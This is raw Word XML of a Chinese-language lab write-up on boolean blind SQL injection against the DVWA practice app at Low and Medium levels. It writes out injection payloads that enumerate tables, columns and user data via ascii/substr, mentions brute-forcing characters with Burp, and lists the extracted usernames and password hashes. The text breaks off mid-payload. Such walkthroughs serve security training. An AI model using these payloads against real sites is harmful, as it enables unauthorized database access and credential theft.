          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数的意思是返回一个字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349EF6EE" w14:textId="61EE774A" w:rsidR="00775161" w:rsidRDefault="00477B9B" w:rsidP="00733321">
      <w:bookmarkStart w:id="3" w:name="_Hlk47083798"/>
      <w:r>
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">((select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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> limit 0,1),1,1))</w:t>
      </w:r>
      <w:r w:rsidR="007C1B38">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>=0-127</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据这段代码返回的0-127的ascii码值来跟ascii字符代码表进行对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="55EC1C07" w14:textId="2542EC15" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C197462" wp14:editId="4B981AA4">
            <wp:extent cx="5274310" cy="34137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A7B1" w14:textId="31D3AC82" w:rsidR="00775161" w:rsidRDefault="00775161" w:rsidP="00733321">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对比图0~127对应着它对应的数字和图标，比如大写A对应的就是65，小写的a对应的是97，这样来对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208DCC59" w14:textId="221CDD64" w:rsidR="00F95AF8" w:rsidRDefault="00FC5F79" w:rsidP="00FC5F79">
      <w:bookmarkStart w:id="4" w:name="_Hlk47083811"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve">1' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve">((select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>' limit 1,1),1,1))=</w:t>
      </w:r>
      <w:r w:rsidR="00570D81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="363F2233" w14:textId="6E51BE38" w:rsidR="00B23568" w:rsidRDefault="00B23568" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后用</w:t>
      </w:r>
      <w:r w:rsidR="00570D81">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bp爆破，</w:t>
      </w:r>
      <w:r w:rsidR="00570D81">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="337328A7" wp14:editId="6F320E0B">
            <wp:extent cx="5274310" cy="8216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5EDB" w14:textId="72990AA8" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到117进行对比得到u，表名的第一个字符就是u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743AC078" w14:textId="119C996B" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再获取第二个</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB66641" w14:textId="3F16A25B" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32702421" wp14:editId="79F09A55">
            <wp:extent cx="5274310" cy="41205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把1改为2，然后继续进行爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F63DC" w14:textId="430912C3" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44E43EDE" wp14:editId="3F79E9BF">
            <wp:extent cx="5274310" cy="9131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9C87" w14:textId="30EF8B69" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到115，进行对比得到s，第二个字符就是s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3FAD5" w14:textId="47C755A0" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后以此类推得到表名users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452CC7FF" w14:textId="6201588D" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="68AF0E09" w14:textId="33EEAF8D" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后就是获取字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D1819F" w14:textId="24C8CAD9" w:rsidR="00570D81" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟获取表名一样，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D61321" w14:textId="55DE2B61" w:rsidR="00EB0641" w:rsidRDefault="00570D81" w:rsidP="00FC5F79">
      <w:bookmarkStart w:id="5" w:name="_Hlk47083840"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve">1' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve">((select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t xml:space="preserve">' and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00570D81">
        <w:t>='users' limit 0,1),1,1))=</w:t>
      </w:r>
      <w:r w:rsidR="005E53CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EB0641">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="461AB4AF" w14:textId="47331243" w:rsidR="00570D81" w:rsidRDefault="00EB0641" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46001503" wp14:editId="1B0AD953">
            <wp:extent cx="5274310" cy="8064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6F02" w14:textId="332618AB" w:rsidR="00EB0641" w:rsidRDefault="00EB0641" w:rsidP="00FC5F79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/>
        </w:rPr>
        <w:t>以此类推得到</w:t>
      </w:r>
      <w:r w:rsidRPr="004617CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user_id,first_name,last_name,user,password,avatar,last_login,failed_login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这些字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578D255F" w14:textId="67EF2AE4" w:rsidR="00326EBA" w:rsidRDefault="00326EBA" w:rsidP="00FC5F79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然后</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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再猜解它们</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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的数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4D6A1B" w14:textId="4E35DB7D" w:rsidR="00326EBA" w:rsidRDefault="00326EBA" w:rsidP="00FC5F79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1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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‘</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r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 and ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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((select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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 from users limit 1,1),1,1))=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033235B6" w14:textId="79959F74" w:rsidR="00326EBA" w:rsidRDefault="00326EBA" w:rsidP="00FC5F79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得到49对比ascii表得到1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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C131C80" w14:textId="391BE56C" w:rsidR="00326EBA" w:rsidRDefault="00326EBA" w:rsidP="00FC5F79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以此类推得到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>users_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=1,2,3,4,5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D4323" w14:textId="338A87CD" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79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>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>admin,Gordon</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,hack,Pablo,Bob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64889E82" w14:textId="48F1715D" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79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proofErr w:type="spellStart"/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l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ast_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>admin,Brown</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,Me</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Picasso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,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7196CE61" w14:textId="2C03F9D5" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79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u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ser=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>admin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,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608"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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>gordonb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1337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,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pablo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608"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 smithy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F942D2F" w14:textId="0ED9800F" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79">
      <w:r>
        <w:t>password=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> 5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t>e99a18c428cb38d5f260853678922e03</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491273AD" w14:textId="00D5AD5C" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79">
      <w:r w:rsidRPr="00E55608">
        <w:t>8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55608">
        <w:t>0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20684976" w14:textId="22C0405F" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79">
      <w:r w:rsidRPr="00E55608">
        <w:t>5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44724C9C" w14:textId="09041C8E" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是布尔盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC823E9" w14:textId="2C754EC2" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="2B5B2133" w14:textId="62156842" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="6A4D97CC" w14:textId="3DC5558F" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="567030BB" w14:textId="290A5159" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="0BDF8DE4" w14:textId="1A530D0B" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="7F280EB9" w14:textId="3EC9C418" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00FC5F79"/>
    <w:p w14:paraId="5D74B458" w14:textId="35A05942" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00E55608">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Level:Medium</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="638D0241" w14:textId="52999273" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00E55608">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68942B87" wp14:editId="4AA0746F">
            <wp:extent cx="5274310" cy="16300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5716" w14:textId="23DA49E0" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00E55608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t>Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级别的使用了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E55608">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mysql_real_escape_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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对特殊符号进行转义，同时使用了下拉表单限制注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0850D34C" w14:textId="0C9DDD0A" w:rsidR="00E55608" w:rsidRDefault="00E55608" w:rsidP="00E55608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跟Low级别的差不多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3591C4" w14:textId="5E98E313" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E556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4C2C4A" wp14:editId="156A6F5D">
            <wp:extent cx="5274310" cy="41205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B4FA" w14:textId="5936A11B" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过抓包测试</w:t>
      </w:r>
      <w:r>
        <w:t>1 or 1=1#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得知</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF674C" w14:textId="06DBBB69" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是数字型注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B15422" w14:textId="18A53E13" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164B29FC" w14:textId="7E017038" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="00E55608">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’ and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>database(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>),1)=’a’</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8321FC" w14:textId="77777777" w:rsidR="005967C2" w:rsidRDefault="005967C2" w:rsidP="005967C2">
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve">1' and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>ascii(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve">((select </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC5F79">
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
